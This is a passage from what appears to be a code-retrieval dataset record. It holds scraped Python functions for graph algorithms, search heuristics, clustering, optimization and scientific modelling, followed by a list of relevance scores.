for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def rwgraph_analyze2(input=(None)):\r\n\r\n\r\n #set up graph and degree distribution arrays\r\n n=2000\r\n m=4\r\n G=nx.barabasi_albert_graph(n, m, seed=5)\r\n Nt=100\r\n M=20000\r\n maxdeg=0\r\n degree_dist=[]\r\n for i in range(0,n):\r\n degree_dist.append(G.degree[i])\r\n if G.degree[i]>maxdeg:\r\n maxdeg=G.degree[i]\r\n j=i\r\n\r\n #set inital conditions and D\r\n y0=np.zeros(n,dtype=int)\r\n y0[j]=200\r\n D=1\r\n #define time for odi Int\r\n t=np.arange(Nt+1,dtype=int)\r\n #set up operators\r\n A = nx.adjacency_matrix(G)\r\n Q = A.toarray().sum(axis=1)\r\n L=np.diag(Q)-A.toarray()\r\n Q_inv=1/Q\r\n Ls=np.diag(np.ones(n))-np.matmul(np.diag(Q_inv),A.toarray())\r\n Ls_tran=np.transpose(Ls)\r\n\r\n #convert to sparse operators and include diffusion\r\n L_spar = scipy.sparse.csr_matrix(-D*L)\r\n Ls_spar = scipy.sparse.csr_matrix(-D*Ls)\r\n Ls_tran_spar = scipy.sparse.csr_matrix(-D*Ls_tran)\r\n A=nx.adjacency_matrix(G)\r\n 
L=-D*(scipy.sparse.diags(degree_arr)-A)\r\n Ls=-D*(scipy.sparse.diags(np.ones(N))-scipy.sparse.diags(1/degree_arr).dot(A))\r\n\r\n #define operators\r\n def Lap(y,t):\r\n return scipy.sparse.csr_matrix.__mul__(L_spar,y)\r\n def Lap_Ls(y,t):\r\n return scipy.sparse.csr_matrix.__mul__(Ls_spar,y)\r\n def Lap_Ls_tran(y,t):\r\n return scipy.sparse.csr_matrix.__mul__(Ls_tran_spar,y)\r\n\r\n #solutions of different operators\r\n solL=scipy.integrate.odeint(Lap,y0,t)\r\n solLs=scipy.integrate.odeint(Lap_Ls,y0,t)\r\n solLs_tran=scipy.integrate.odeint(Lap_Ls_tran,y0,t)\r\n\r\n\r\n #finds eigen values and vectors and puts them into order\r\n def eigen(L):\r\n eigen_values,eigen_vectors=scipy.linalg.eig(-L)\r\n idx = eigen_values.argsort()[::-1]\r\n eigen_values = eigen_values[idx]\r\n eigen_vectors = eigen_vectors[:,idx]\r\n return eigen_values,eigen_vectors\r\n\r\n #finds all eigen values and eigen vectors of the different operators. can use sparse matrics\r\n eigen_values_LS,eigen_vectors_LS=eigen(Ls)\r\n eigen_values_LS_tran,eigen_vectors_LS_tran=eigen(Ls_tran)\r\n eigen_values_L,eigen_vectors_L=eigen(L)\r\n eigen_values_L2,eigen_vectors_L2=eigen(L*0.36)\r\n\r\n ### could have eigs here as didn't end up using all eigenvalues ####\r\n #eigen values graph\r\n n0=len(eigen_values_L)\r\n eig_nums=np.arange(n0)\r\n plt.figure(figsize=(12, 6))\r\n plt.scatter(eig_nums[0:10],eigen_values_L2[0:10],s=50,marker=\"x\" ,label='L , D=0.36')\r\n plt.scatter(eig_nums[0:10],eigen_values_LS[0:10],s=50, marker=\"|\",label='LS , D=1')\r\n plt.scatter(eig_nums[0:10],eigen_values_LS_tran[0:10],s=50,marker='_',label='LS_tran , D=1')\r\n plt.scatter(eig_nums[0:10],eigen_values_L[0:10],s=50,marker=\"+\" ,label='L , D=1')\r\n plt.legend(loc=\"lower left\", fontsize=12,fancybox=True, framealpha=1, shadow=True, borderpad=1)\r\n plt.xlabel('eigen value number')\r\n plt.ylabel('eigenvalue')\r\n plt.title(\"Eigenvlaues of Laplacian Matrixs\")\r\n plt.show()\r\n\r\n print(\"4 biggest eigenvalues for each operater\")\r\n print('L=',eigen_values_L[0:4])\r\n print('Ls=',eigen_values_LS[0:4])\r\n print('Ls_tran=',eigen_values_LS_tran[0:4])\r\n #prints 4 biggest eigen values\r\n #counts node distrubtion by creating dictionary\r\n def result_count(sol,Nt,G):\r\n \"\"\" returns cumlative frequency/probailties for nodes of same degree and returns dictionary\"\"\"\r\n n = G.number_of_nodes()\r\n dict_freq={}\r\n for i in range(n):\r\n k=G.degree(i)\r\n if k not in dict_freq:\r\n dict_freq[k]=sol[Nt,i]\r\n else:\r\n dict_freq[k]+=sol[Nt,i]\r\n return dict_freq\r\n\r\n #frequency count of solutions\r\n dict_freq=result_count(solL,Nt,G)\r\n dict_freq2=result_count(solLs,Nt,G)\r\n dict_freq3=result_count(solLs_tran,Nt,G)\r\n\r\n #random walk data\r\n X=rwgraph(G,j,20000,100)\r\n Listnodes7=[]\r\n for i in range(20000):\r\n Listnodes7.append(G.degree(X[i,100]))\r\n X=rwgraph(G,j,200,100)\r\n Listnodes8=[]\r\n for i in range(200):\r\n Listnodes8.append(G.degree(X[i,100]))\r\n X=rwgraph(G,j,50000,5000)\r\n Listnodes9=[]\r\n for i in range(50000):\r\n Listnodes9.append(G.degree(X[i,5000]))\r\n listfreq7=CountFrequency(Listnodes7)\r\n listfreq8=CountFrequency(Listnodes8)\r\n listfreq9=CountFrequency(Listnodes9)\r\n listfreq_deg=CountFrequency(degree_dist)\r\n z2=[]\r\n z3=[]\r\n z1=[]\r\n z_deg2=[]\r\n z_deg3=[]\r\n z_deg1=[]\r\n for i in listfreq7:\r\n z2.append(listfreq7[i]/(listfreq_deg[i]*20000))\r\n z_deg2.append(i)\r\n for i in listfreq8:\r\n z3.append(listfreq8[i]/(listfreq_deg[i]*200))\r\n z_deg3.append(i)\r\n for i in listfreq8:\r\n 
z1.append(listfreq9[i]/(listfreq_deg[i]*50000))\r\n z_deg1.append(i)\r\n #operator solutions compared to node degree frequency\r\n z4,z5,z6=[],[],[]\r\n z_deg4,z_deg5,z_deg6=[],[],[]\r\n for i in dict_freq:\r\n z4.append(dict_freq[i]/(listfreq_deg[i]*200))\r\n z_deg4.append(i)\r\n for i in dict_freq2:\r\n z5.append(dict_freq2[i]/(listfreq_deg[i]*200))\r\n z_deg5.append(i)\r\n for i in dict_freq3:\r\n z6.append(dict_freq3[i]/(listfreq_deg[i]*200))\r\n z_deg6.append(i)\r\n\r\n plt.figure(figsize=(15, 10))\r\n plt.scatter(z_deg1, z1,label='Nt=5000, M=50000')\r\n plt.scatter(z_deg2, z2,label='Nt=100, M=20000')\r\n plt.scatter(z_deg3, z3,label='Nt=100, M=200')\r\n plt.scatter(z_deg4, z4,label='L, Nt=100')\r\n plt.scatter(z_deg5, z5,label='Ls, Nt=100')\r\n plt.scatter(z_deg6, z6,label='Ls_tran, Nt=100')\r\n plt.ylim((-0.005,0.020))\r\n plt.xlabel('degree of node')\r\n plt.ylabel('frequency of final position / M*frequency of degree')\r\n plt.legend(loc=\"upper left\", fontsize=12,fancybox=True, framealpha=1, shadow=True, borderpad=1)\r\n plt.title(\"Frequency of final positions relative to number of nodes of that degree, for changing times Nt and M.\")\r\n plt.show()\r\n\r\n #code to produce final graph\r\n iarray1=LinearModel(G,x=j,i0=1,L1='L',D=1,tf=20,Nt=Nt)\r\n iarray2=LinearModel(G,x=j,i0=1,L1='Ls',D=1,tf=20,Nt=Nt)\r\n iarray3=LinearModel(G,x=j,i0=1,L1='Lst',D=1,tf=20,Nt=Nt)\r\n tarray = np.linspace(0,5,Nt+1)\r\n plt.figure(figsize=(12, 6))\r\n plt.plot(tarray, iarray1[:,7] ,label='rand node L,deg=46',color='b',alpha=0.5)\r\n plt.plot(tarray, iarray2[:,7] ,label='rand node Ls,deg=46',marker='|',color='r')\r\n plt.scatter(tarray, iarray3[:,7] ,label='rand node LST,deg=46',marker='_',color='y')\r\n plt.scatter(tarray, iarray1[:,1801] ,label='rand node L, deg=5',color='m',alpha=0.5,marker='+')\r\n plt.plot(tarray, iarray2[:,1801] ,label='rand node Ls,deg=5',marker='|',color='c')\r\n plt.scatter(tarray, iarray3[:,1801] ,label='rand node LST,deg=5',marker='_',color='g')\r\n plt.xlabel('time')\r\n plt.ylabel('representive frequency')\r\n plt.legend()\r\n plt.title(\"Comparing repestive frequency of a random nodes, for the different linear models,time step=50,D=0.1\")\r\n plt.show()\r\n return None #modify as needed\r", "def safeJourney(Alist,s,d):\n #Initialize dictionaries\n dinit = 10**6\n Edict = {} #Explored nodes\n Udict = {} #Unexplored nodes\n path = [[] for l in Alist]\n\n Alen = len(Alist) #length of Alist\n dinits = [dinit]*Alen #list of airport indexes\n Udict = dict(zip(list(range(Alen)),dinits)) #zip into dictionary\n Udict[s] = 0\n path[s] = [s]\n \n #Main search\n while len(Udict)>0:\n #Find node with min d in Udict and move to Edict\n dmin = dinit\n for n,w in Udict.items():\n if w<dmin:\n dmin=w\n nmin=n\n Edict[nmin] = Udict.pop(nmin)\n print(\"moved node\", nmin)\n\n #Update provisional distances for unexplored neighbors of nmin\n \n #for n,w in G.adj[nmin].items():\n for item in Alist[nmin]: #nminth element is a list of two element tuples (node, weight)\n n = item[0] #first elt of tuple is node/neighbour\n w = item[1] #2nd elt is density/weigh\n #for n,w in etc_______________________-\n \n if n in Edict:\n pass\n elif n in Udict:\n #dcomp = dmin + w\n dcomp = max(w,dmin) #take largest value to record most dangerous segment\n if dcomp<Udict[n]:\n print(Udict)\n Udict[n]=dcomp\n path[n] = path[nmin] + [n]\n #path[n].extend(path[nmin])\n #path[n] = path[nmin]\n \n #path[n].append(n) #n not nmin\n print(path)\n # else:\n #dcomp = dmin + w\n # dcomp = max(w,dmin)\n # Udict[n] = 
dcomp\n #path[n].extend(path[nmin])\n #path[n].append(nmin) \n \n if nmin == d: #if current node is destination\n return path[d],Edict[d]\n return [] #no path", "def estimate_nc(self):\n mol = self.m\n torsma = '[!$(*#*)&!D1]~[!$(*#*)&!D1]'\n q = Chem.MolFromSmarts(torsma)\n matches = mol.GetSubstructMatches(q)\n nmat = len(matches)\n #torsions = []\n\n # since mostly the molecules concerned here are amons\n # with N_I <=7, we care about 3- to 7-membered rings\n atsr = _get_ring_nodes(mol,3,7,F)\n #print ' -- atsr = ', atsr\n inrs = np.zeros(self.na, dtype=int) # [this atom is] in [how many] number of rings\n for ia in self.ias_heav:\n _sets = []\n for _ats in atsr:\n if ia in _ats:\n _sets.append(_ats)\n #print ' -- ia, _sets = ', ia, _sets\n inr = find_number_of_unique_set(_sets)\n inrs[ia] = inr\n #print ' -- inrs = ', inrs\n if nmat == 0:\n ns = [1]\n if self.debug: print(' |__ ns = ', ns)\n nc = 1\n self.nc = nc\n else:\n ns = []; patts = []\n scale = 0\n for match in matches:\n j = match[0]\n k = match[1]\n cb = set([j,k])\n bond = mol.GetBondBetweenAtoms(j, k)\n aj = mol.GetAtomWithIdx(j)\n ak = mol.GetAtomWithIdx(k)\n hj, hk = [ _hyb[_a.GetHybridization()] for _a in [aj,ak] ]\n iok1 = (hj != 2); iok2 = (hj != 3)\n iok3 = (hk != 2); iok4 = (hk != 3)\n if (iok1 and iok2) or (iok3 and iok4): continue\n\n # do not allow internal rotation about two adjacent sp2 atoms are in a ring\n if inrs[j] and inrs[k] and hj==2 and hk==2: continue\n\n pjk = []\n jk = [j,k]\n hsjk = [hj,hk]\n for _ in range(2):\n ia1 = jk[_]\n ia2 = j if ia1==k else k\n hyb = hsjk[_]\n nbrs = np.setdiff1d(self.ias[self.bom[ia1]>0], [ia2])\n ihs = (self.zs[nbrs]==1)\n if np.all(ihs): # case 'a', e.g., 'a1','a2','a3'\n # check ~X-CH3, ~X-NH2, ...\n nh = len(ihs)\n if hyb==3:\n # for rotor X-C in ~X-CH3, one torsion is allowed\n sn = {1:'a3', 2:'a2', 3:'a1'}[nh]\n else: # hyb==2\n sn = {1:'a2', 2:'a1', 3:'a1'}[nh]\n else: # case 'b', e.g., 'b1','b2','b3'\n inr = inrs[ia1]\n if self.cns[ia1]==2 and inr: # e.g., O<, S<, Se<,\n sn = 1\n else:\n if hyb==3:\n sn = 2 if inr <= 1 else 1 # {0:'b3', 1:'b3', 2:'b2', 3:'b1', 4:'b1'}[inr]\n else: # hyb==2:\n sn = 'b2' if inr == 0 else 'b1'\n #sn = {0:'b2', 1:'b1', 2:'b1', 3:'b1'}[inr]\n _patt = '%d%s'%(hyb,sn)\n pjk.append(_patt)\n #print 'j,k = ', j,k, ', pjk = ', pjk\n nci = min([ int(patt[-1]) for patt in pjk ]) # ndic[patt]; sci = scdic[patt]\n if nci > 1:\n ns.append( nci )\n if not np.any([inrs[j],inrs[k]]):\n scale += 1\n if scale == 0: scale = 1\n nc = np.int(np.floor(np.product(ns))) * scale #* 2\n self.nc = nc if nc > 99 else 99\n if self.debug: print(' |__ ns = ', ns)\n if self.debug: print(' |__ scale = %d, nc = %d'%(scale, nc))\n self.ns = np.array(ns, np.int)", "def floyd_warshall(A):\n n = A.shape[0]\n \n for k in tqdm(range(1, n+1)):\n for i in range(n):\n for j in range(n):\n A[i,j,k] = min(A[i,j,k-1], A[i,k-1,k-1]+A[k-1,j,k-1])\n \n \n for i in range(n):\n if A[i,i,n] <0:\n min_path = 'Negative cycle'\n return min_path\n min_path = np.min(A[:,:,n])\n \n return min_path", "def kmeans(matrix, k) :\n clusters = [0 for i in range(k)]\n lastcluster=[0 for i in range(k)]\n min_=0\n max_=matrix.__len__()\n print \"len\",max_\n cluster = [0 for i in range(k)]\n for i in range(k) :\n\n cluster[i]=int(random.random() * (max_ - min_) + min_)\n clusters[i]=matrix[cluster[i]]\n lastcluster[i]=matrix[cluster[i]]\n #print cluster[i],clusters[i]\n\n lastmatchs = [ [] for i in range(k)]\n\n \"\"\" initial the round is 100\"\"\"\n rounds = 100\n while rounds > 0 :\n matchs = [ [] 
for i in range(k)]\n print 'round \\t',rounds\n for i in range(len(matrix)) :\n bestmatch_cluster = None\n\n min_distance = 100000\n for j in range(k) :\n dis = pearson_distance(clusters[j], matrix[i])\n if dis < min_distance :\n min_distance = dis\n bestmatch_cluster = j\n matchs[bestmatch_cluster].append(i)\n\n print_matchs(matchs)\n #print_matchs(lastmatchs)\n\n\n\n if matchs == lastmatchs : break\n #if cluster== lastcluster :break\n lastmatchs = [[ item for item in matchs[i] ] for i in range(k)]\n\n #move the centroids to the average of their members\n for j in range(k) :\n avg = [0.0 for i in range(len(matrix[0])) ]\n for m in matchs[j] :\n vec = matrix[m]\n for i in range(len(matrix[0])) :\n avg[i] += vec[i]\n avg = [ item / len(matrix[0]) for item in avg]\n clusters[j] = avg\n lastcluster=clusters\n\n\n rounds -= 1\n print \"rounds:\",100-rounds\n print \"result:\"\n for i in matchs:\n print i", "def astar_multi(maze):\n # TODO: Write your code here\n gFunction = {}\n frontier = PriorityQueue()\n path = []\n ret = []\n MSTLengths = {}\n edges = {}\n\n objectives = maze.getObjectives()\n start = State(maze.getStart()[0], maze.getStart()[1], objectives)\n gFunction[start] = 0\n frontier.put(start) \n getEdgeWeights(maze, objectives, edges) # init edge weights for MST\n\n while not frontier.empty():\n\n currentState = frontier.get()\n currentCell = currentState.cell()\n objectivesLeft = currentState.objectives()\n\n if objectivesLeft.count(currentCell) != 0:\n objectivesLeft.remove(currentCell)\n\n # all objectives found, initialise backtrace and exit loop\n if len(objectivesLeft) == 0:\n path.clear()\n ret.clear()\n path.append(currentState)\n ret.append(currentCell)\n break\n \n # if we have already calculated MST length we can reuse value\n # else calculate MST length for this state and store it.\n length = 0\n if str(objectivesLeft) in MSTLengths:\n length = MSTLengths[str(objectivesLeft)]\n else:\n length = getMSTLength(objectivesLeft.copy(), maze, edges)\n MSTLengths[str(objectivesLeft)] = length\n\n neighbors = maze.getNeighbors(currentCell[0], currentCell[1])\n\n for i in neighbors:\n\n neighbor = State(i[0], i[1], objectivesLeft)\n gVal= gFunction[currentState] + 1\n\n if neighbor not in gFunction or gVal < gFunction[neighbor]:\n\n neighbor.setParent(currentState)\n gFunction[neighbor] = gVal\n\n hFunction = []\n for j in objectivesLeft:\n hFunction.append(abs(j[0] - i[0]) + abs(j[1] - i[1]) + length) # use MST length + manhatten distance to nearest objective as heuristic.\n\n hVal = min(hFunction)\n\n neighbor.setfFunction(gFunction[neighbor] + hVal)\n frontier.put(neighbor)\n\n # backtrace\n while path[0]!= start:\n \n currentCell = path[0]\n path.insert(0, currentCell.parent())\n ret.insert(0, currentCell.parent().cell())\n\n return ret", "def get_result_k(att_trees, data):\n data_back = copy.deepcopy(data)\n all_ncp = []\n all_rtime = []\n all_pollution = []\n deletion_all_ncp = []\n deletion_all_rtime = []\n # for k in range(5, 105, 5):\n for k in [2, 5, 10, 25, 50, 100]:\n if __DEBUG:\n print '#' * 30\n print \"K=%d\" % k\n print \"Enhanced Mondrian\"\n _, eval_result = mondrian(att_trees, data, k)\n data = copy.deepcopy(data_back)\n all_ncp.append(round(eval_result[0], 2))\n all_rtime.append(round(eval_result[1], 2))\n all_pollution.append(round(eval_result[2], 2))\n if __DEBUG:\n print \"NCP %0.2f\" % eval_result[0] + \"%\"\n print \"Running time %0.2f\" % eval_result[1] + \"seconds\"\n print \"Missing Pollution = %.2f %%\" % eval_result[2]\n print \"Mondrian\"\n _, 
eval_result = mondrian_delete_missing(att_trees, data, k)\n data = copy.deepcopy(data_back)\n if __DEBUG:\n print \"NCP %0.2f\" % eval_result[0] + \"%\"\n print \"Running time %0.2f\" % eval_result[1] + \"seconds\"\n deletion_all_ncp.append(round(eval_result[0], 2))\n deletion_all_rtime.append(round(eval_result[1], 2))\n print \"Mondrian\"\n print \"All NCP\", deletion_all_ncp\n print \"All Running time\", deletion_all_rtime\n print \"Enhanced Mondrian\"\n print \"All NCP\", all_ncp\n print \"All Running time\", all_rtime\n print \"Missing Pollution\", all_pollution", "def get_radius_idx(x, y, x0, y0, r, Tree, n_reloc=0,\r\n min_months=24, max_reloc=3, time=None, height=None):\r\n\r\n # Query the Tree from the center of cell\r\n idx = Tree.query_ball_point((x0, y0), r)\r\n\r\n #print 'query #: 1 ( first search )'\r\n\r\n if len(idx) < 2:\r\n return idx\r\n\r\n if time is not None:\r\n n_reloc = max_reloc\r\n\r\n if n_reloc < 1:\r\n return idx\r\n\r\n # Relocate center of search radius and query again\r\n for k in range(n_reloc):\r\n\r\n # Compute new search location => relocate initial center\r\n x0_new, y0_new = np.median(x[idx]), np.median(y[idx])\r\n\r\n # Compute relocation distance\r\n reloc_dist = np.hypot(x0_new-x0, y0_new-y0)\r\n\r\n # Do not allow total relocation to be larger than the search radius\r\n if reloc_dist > r:\r\n break\r\n\r\n #print 'query #:', k+2, '( reloc #:', k+1, ')'\r\n #print 'relocation dist:', reloc_dist\r\n\r\n idx = Tree.query_ball_point((x0_new, y0_new), r)\r\n\r\n # If max number of relocations reached, exit\r\n if n_reloc == k+1:\r\n break\r\n\r\n # If time provided, keep relocating until time-coverage is sufficient\r\n if time is not None:\r\n\r\n t_b, x_b = binning(time[idx], height[idx], dx=1/12., window=1/12.)[:2]\r\n\r\n print(('months #:', np.sum(~np.isnan(x_b))))\r\n\r\n # If sufficient coverage, exit\r\n if np.sum(~np.isnan(x_b)) >= min_months:\r\n break\r\n\r\n return idx", "def random_walk(G, k, convergence_threshold, plot):\n #SET: minimum amount of iterations\n min_iterations = 1000\n #SET: minimum amount of walks\n min_walks = 10\n #SET: maximum amount of walks\n max_walks = 5000 \n\n double_zero, double_one, zero_one, one_zero = 0, 0, 0, 0\n RWC_list = []\n convergence = 10000\n i = 0\n\n nodes0 = [node for node in G.nodes(data=True) if node[1]['cluster'] == 0]\n nodes1 = [node for node in G.nodes(data=True) if node[1]['cluster'] == 1]\n\n if nodes0 == [] or nodes1 == []:\n return 'NaN'\n \n degrees0 = sorted([(node[0], G.degree(node[0])) for node in nodes0], key=itemgetter(1), reverse=True)\n degrees1 = sorted([(node[0], G.degree(node[0])) for node in nodes1], key=itemgetter(1), reverse=True)\n\n k_tuples= degrees0[:int(ceil(k*len(nodes0)))] + degrees1[:int(ceil(k*len(nodes1)))]\n k_nodes= [node for (node, degree) in k_tuples]\n \n while convergence > convergence_threshold or i < min_iterations:\n # choose random cluster (choose random between 0,1), prob is 0.5\n begin_cluster = random.choice([0, 1])\n\n # choose random node in cluser\n if begin_cluster == 0:\n current_node = random.choice(nodes0)\n else:\n current_node = random.choice(nodes1)\n\n # choose random edge from cluster (repeat)\n current_node = current_node[0]\n\n j = 0\n while j < max_walks:\n previous_node = current_node\n current_node = random.choice(G.neighbors(current_node))\n #prevent self_loops\n if previous_node == current_node:\n current_node = previous_node\n j+=1\n continue\n #print('{}'.format(current_node))\n if current_node in k_nodes:\n if j < min_walks:\n 
continue\n else:\n break\n j += 1 \n\n # what cluster end node\n end_cluster = G.node[current_node]['cluster']\n\n #Keep tally of outcomes\n if begin_cluster == 0:\n if end_cluster == 0:\n double_zero += 1\n else:\n zero_one += 1\n else:\n if end_cluster == 0:\n one_zero += 1\n else:\n double_one += 1\n\n #calculate conditional probabilities\n total = double_zero + double_one + zero_one + one_zero\n\n prob00 = (double_zero/total) / 0.5\n prob11 = (double_one/total) / 0.5\n prob10 = (one_zero/total)/ 0.5\n prob01 = (zero_one/total)/ 0.5\n\n rwc = prob00*prob11 - prob10*prob01\n\n #update convergence \n if RWC_list != []:\n convergence = abs(rwc - RWC_list[-1])\n \n i += 1 \n RWC_list.append(rwc)\n\n # Plot RWC scores over time \n if plot == True:\n plt.plot(RWC_list)\n plt.show()\n\n return(rwc)", "def single_cuckoo_search(nest,fitness,Lb,Ub,pa,step):\n\n\tn = nest.shape[0]\n\tfmin, best, nest, fitness = get_best_nest(nest, nest, fitness)\n\tnew_best = fmin\n\told_best = np.inf\n\tbestnest = best\n\n\tN_iter=0\n\tk = 0\n\tglobal Tol\n\n\twhile N_iter < 100000:\n\t\tcuckoo = np.random.randint(n)\n\t\tnew_nest = get_cuckoo(nest, cuckoo, Lb, Ub)\n\t\tnew_obj = fobj(new_nest)\n\t\tcomp_cuckoo = np.random.randint(n)\n\t\tif new_obj < fitness[comp_cuckoo]:\n\t\t\tnest[comp_cuckoo,:] = new_nest\n\n\t\tnew_nest = empty_nests(nest, Lb, Ub, pa)\n\t\tfnew, best, nest, fitness = get_best_nest(nest, new_nest, fitness)\n\t\tif fnew < fmin:\n\t\t\tif abs(fnew - fmin) < Tol:\n\t\t\t\tbreak\n\t\t\tfmin=fnew\n\t\t\tbestnest=best\n\t\tN_iter = N_iter + 1 + int(n * pa)\n\n\treturn bestnest, fmin, nest, fitness, N_iter", "def test_jam_axi_rms():\n np.random.seed(123)\n xbin, ybin = np.random.uniform(low=[-55, -40], high=[55, 40], size=[1000, 2]).T\n\n inc = 60. # Assumed galaxy inclination\n r = np.sqrt(xbin**2 + (ybin/np.cos(np.radians(inc)))**2) # Radius in the plane of the disk\n a = 40 # Scale length in arcsec\n vr = 2000*np.sqrt(r)/(r+a) # Assumed velocity profile\n vel = vr * np.sin(np.radians(inc))*xbin/r # Projected velocity field\n sig = 8700/(r+a) # Assumed velocity dispersion profile\n rms = np.sqrt(vel**2 + sig**2) # Vrms field in km/s\n\n surf = np.array([39483., 37158., 30646., 17759., 5955.1, 1203.5, 174.36, 21.105, 2.3599, 0.25493])\n sigma = np.array([0.153, 0.515, 1.58, 4.22, 10, 22.4, 48.8, 105, 227, 525])\n qObs = np.full_like(sigma, 0.57)\n\n distance = 16.5 # Assume Virgo distance in Mpc (Mei et al. 2007)\n mbh = 1e8 # Black hole mass in solar masses\n beta = np.full_like(surf, 0.3)\n\n surf_lum = surf # Assume self-consistency\n sigma_lum = sigma\n qobs_lum = qObs\n surf_pot = surf\n sigma_pot = sigma\n qobs_pot = qObs\n\n sigmapsf = 0.6\n pixsize = 0.8\n goodbins = r > 10 # Arbitrarily exclude the center to illustrate how to use goodbins\n\n # The model is similar but not identical to the adopted kinematics!\n rmsModel, ml, chi2, flux = jam_axi_rms(\n surf_lum, sigma_lum, qobs_lum, surf_pot, sigma_pot, qobs_pot,\n inc, mbh, distance, xbin, ybin, plot=True, rms=rms, sigmapsf=sigmapsf,\n beta=beta, pixsize=pixsize, tensor='zz', goodbins=goodbins)\n plt.pause(0.01)", "def _AffineGrothendieck(self, w,m):\n return sum(self._G_to_km_on_basis_single_level(w,j) for j in range(w.length(),m+1))" ]
[ "0.615799", "0.5902298", "0.58482414", "0.57372916", "0.57352954", "0.57080084", "0.56059325", "0.55901784", "0.5569681", "0.55468035", "0.5539385", "0.5525096", "0.5479864", "0.546164", "0.54158294", "0.5414072", "0.53997874", "0.53977036", "0.5389939", "0.5384784", "0.5362815", "0.53549546", "0.5301085", "0.5295417", "0.5290579", "0.528696", "0.52823", "0.5246708", "0.5243289", "0.52287936", "0.5216233", "0.5214604", "0.5214077", "0.5192999", "0.5192729", "0.51729304", "0.5171315", "0.51652074", "0.51503265", "0.51499903", "0.513627", "0.51331955", "0.51302135", "0.5109444", "0.5107845", "0.5104503", "0.5098292", "0.5096239", "0.5095959", "0.5092094", "0.5075559", "0.50672966", "0.5059657", "0.50586104", "0.5038748", "0.50296474", "0.5024526", "0.50214326", "0.50187755", "0.5017733", "0.5015472", "0.5013709", "0.5010562", "0.50096685", "0.5009475", "0.5008232", "0.50034887", "0.50014865", "0.50008297", "0.49996176", "0.49970642", "0.49955305", "0.49944803", "0.49940526", "0.4980558", "0.49784267", "0.49782008", "0.49767074", "0.49739233", "0.49667075", "0.49568275", "0.49507892", "0.49505702", "0.49501905", "0.49470818", "0.49396026", "0.49350318", "0.4921503", "0.49128768", "0.49050105", "0.49001536", "0.4899565", "0.4899018", "0.4897662", "0.48964038", "0.48953816", "0.4893123", "0.48923257", "0.4887874", "0.48827052" ]
0.68557984
0
Implementation uses the Miller-Rabin primality test. The optimal number of rounds for this test is 40.
import random


def miller_rabin(n, k):
    # Handle small and even inputs up front; without these guards the
    # original code loops forever for n < 2 and crashes for n = 3
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0:
        return False

    # Write n - 1 as 2^r * s with s odd
    r, s = 0, n - 1
    while s % 2 == 0:
        r += 1
        s //= 2

    # k rounds, each with an independently chosen random base
    for _ in range(k):
        a = random.randrange(2, n - 1)
        x = pow(a, s, n)
        if x == 1 or x == n - 1:
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a witnesses that n is composite
    return True  # probably prime
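A minimal usage sketch, assuming the miller_rabin function above is in scope; 40 rounds follows the recommendation in the query, and the candidate values are arbitrary examples:

if __name__ == "__main__":
    # 97 and 2**61 - 1 are prime; 561 is a Carmichael number, which
    # passes the plain Fermat test for every base coprime to it, yet
    # Miller-Rabin rejects it here with overwhelming probability
    for candidate in (97, 561, 2**61 - 1):
        print(candidate, miller_rabin(candidate, 40))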
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rabin_miller_is_prime(n, k=100):\n\n def basic_is_prime(_n):\n \"\"\"Basic check to see if input is a prime.\n Returns False if input number is a composite with at least one term being one of the primes below 10.000.\n Returns True if the number is a prime (can only be known if it is in the list of primes OR if the number is\n larger than the largest prime in the list and smaller than the square of the last number in the list)\n Returns None if test is inconclusive (if the number has no factors in the list, and is larger than the square\n of the last number in the list).\n\n This code was made by Sahand Saba.\n\n\n :param _n: number to be tested\n :return test result: True, False or None\n \"\"\"\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 